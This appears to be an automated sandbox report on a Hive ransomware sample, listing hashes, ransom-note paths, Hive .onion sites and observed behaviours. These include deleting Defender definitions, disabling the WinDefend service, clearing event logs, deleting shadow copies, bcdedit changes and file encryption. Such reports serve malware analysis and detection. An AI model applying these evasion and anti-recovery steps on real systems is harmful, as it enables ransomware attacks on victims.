Resubmissions
12-01-2022 14:09
220112-rgdpqacghr 1012-01-2022 14:06
220112-rertkacga3 1012-01-2022 14:00
220112-rbg5yscfh2 10Analysis
-
max time kernel
156s -
max time network
179s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 14:09
Static task
static1
Behavioral task
behavioral1
Sample
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
Resource
win7-en-20211208
General
-
Target
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
-
Size
3.8MB
-
MD5
32bd8e6843879a761e6fa9436a90bb66
-
SHA1
26dde522d6f3f87ac982495028494c7f50799696
-
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
-
SHA512
c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Extracted
C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2708 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1428 bcdedit.exe 3012 bcdedit.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\BackupUnpublish.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_BgAAAAYAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\CompareFind.crw => C:\Users\Admin\Pictures\CompareFind.crw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\PopStart.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\StepRestart.raw => C:\Users\Admin\Pictures\StepRestart.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\UninstallEnable.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\SelectUnlock.tif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\BackupUnpublish.raw => C:\Users\Admin\Pictures\BackupUnpublish.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_BgAAAAYAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\CompareFind.crw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\PopStart.png => C:\Users\Admin\Pictures\PopStart.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\SelectUnlock.tif => C:\Users\Admin\Pictures\SelectUnlock.tif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\StepRestart.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\UninstallEnable.png => C:\Users\Admin\Pictures\UninstallEnable.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-100_contrast-white.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\SPRING.INF.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-focus_32.svg.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_PAAAADwAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_KgAAACoAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-phn.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_GAAAABgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6449_32x32x32.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_JAAAACQAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-pl.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\182.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo2.targetsize-36.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1c.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-150.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ul-oob.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images\assets_picker-account-addPerson-48.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-125.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\10909_24x24x32.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-60.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_FgAAABYAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\resources.pri 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-16.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_GAAAABgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\mask_corners_queen.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.VideoTk\CreateMaskPS_BGRA.cso 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\PhotosApp\Assets\ThirdPartyNotices\ThirdPartyNotices.html 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-96.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\WideTile.scale-100.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\selector.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AgAAAAIAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-200_contrast-black.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionWideTile.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\rw_16x11.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-loaders.jar.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\dk_16x11.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-100_contrast-black.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5511_48x48x32.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\CASHREG.WAV.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_JAAAACQAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-200_contrast-white.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CgAAAAoAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_JAAAACQAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CgAAAAoAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\Assets\Images\Tiles\Square71x71Logo.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-80.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_forward_18.svg.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_GgAAABoAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_COL.HXT.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_PAAAADwAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_RTL_Tablet.mp4 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\None.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-200_contrast-white.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-30.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3664 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
NOTEPAD.EXEnotepad.exepid process 3388 NOTEPAD.EXE 3172 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exepid process 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 3784 powershell.exe 3784 powershell.exe 3784 powershell.exe 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3064 wevtutil.exe Token: SeBackupPrivilege 3064 wevtutil.exe Token: SeSecurityPrivilege 3944 wevtutil.exe Token: SeBackupPrivilege 3944 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1896 wmic.exe Token: SeSecurityPrivilege 1896 wmic.exe Token: SeTakeOwnershipPrivilege 1896 wmic.exe Token: SeLoadDriverPrivilege 1896 wmic.exe Token: SeSystemProfilePrivilege 1896 wmic.exe Token: SeSystemtimePrivilege 1896 wmic.exe Token: SeProfSingleProcessPrivilege 1896 wmic.exe Token: SeIncBasePriorityPrivilege 1896 wmic.exe Token: SeCreatePagefilePrivilege 1896 wmic.exe Token: SeBackupPrivilege 1896 wmic.exe Token: SeRestorePrivilege 1896 wmic.exe Token: SeShutdownPrivilege 1896 wmic.exe Token: SeDebugPrivilege 1896 wmic.exe Token: SeSystemEnvironmentPrivilege 1896 wmic.exe Token: SeRemoteShutdownPrivilege 1896 wmic.exe Token: SeUndockPrivilege 1896 wmic.exe Token: SeManageVolumePrivilege 1896 wmic.exe Token: 33 1896 wmic.exe Token: 34 1896 wmic.exe Token: 35 1896 wmic.exe Token: 36 1896 wmic.exe Token: SeIncreaseQuotaPrivilege 1208 wmic.exe Token: SeSecurityPrivilege 1208 wmic.exe Token: SeTakeOwnershipPrivilege 1208 wmic.exe Token: SeLoadDriverPrivilege 1208 wmic.exe Token: SeSystemProfilePrivilege 1208 wmic.exe Token: SeSystemtimePrivilege 1208 wmic.exe Token: SeProfSingleProcessPrivilege 1208 wmic.exe Token: SeIncBasePriorityPrivilege 1208 wmic.exe Token: SeCreatePagefilePrivilege 1208 wmic.exe Token: SeBackupPrivilege 1208 wmic.exe Token: SeRestorePrivilege 1208 wmic.exe Token: SeShutdownPrivilege 1208 wmic.exe Token: SeDebugPrivilege 1208 wmic.exe Token: SeSystemEnvironmentPrivilege 1208 wmic.exe Token: SeRemoteShutdownPrivilege 1208 wmic.exe Token: SeUndockPrivilege 1208 wmic.exe Token: SeManageVolumePrivilege 1208 wmic.exe Token: 33 1208 wmic.exe Token: 34 1208 wmic.exe Token: 35 1208 wmic.exe Token: 36 1208 wmic.exe Token: SeIncreaseQuotaPrivilege 1208 wmic.exe Token: SeSecurityPrivilege 1208 wmic.exe Token: SeTakeOwnershipPrivilege 1208 wmic.exe Token: SeLoadDriverPrivilege 1208 wmic.exe Token: SeSystemProfilePrivilege 1208 wmic.exe Token: SeSystemtimePrivilege 1208 wmic.exe Token: SeProfSingleProcessPrivilege 1208 wmic.exe Token: SeIncBasePriorityPrivilege 1208 wmic.exe Token: SeCreatePagefilePrivilege 1208 wmic.exe Token: SeBackupPrivilege 1208 wmic.exe Token: SeRestorePrivilege 1208 wmic.exe Token: SeShutdownPrivilege 1208 wmic.exe Token: SeDebugPrivilege 1208 wmic.exe Token: SeSystemEnvironmentPrivilege 1208 wmic.exe Token: SeRemoteShutdownPrivilege 1208 wmic.exe Token: SeUndockPrivilege 1208 wmic.exe Token: SeManageVolumePrivilege 1208 wmic.exe Token: 33 1208 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3772 wrote to memory of 1152 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 1152 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 1152 wrote to memory of 3972 1152 net.exe net1.exe PID 1152 wrote to memory of 3972 1152 net.exe net1.exe PID 3772 wrote to memory of 1964 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 1964 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 1964 wrote to memory of 4072 1964 net.exe net1.exe PID 1964 wrote to memory of 4072 1964 net.exe net1.exe PID 3772 wrote to memory of 2808 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 2808 3772 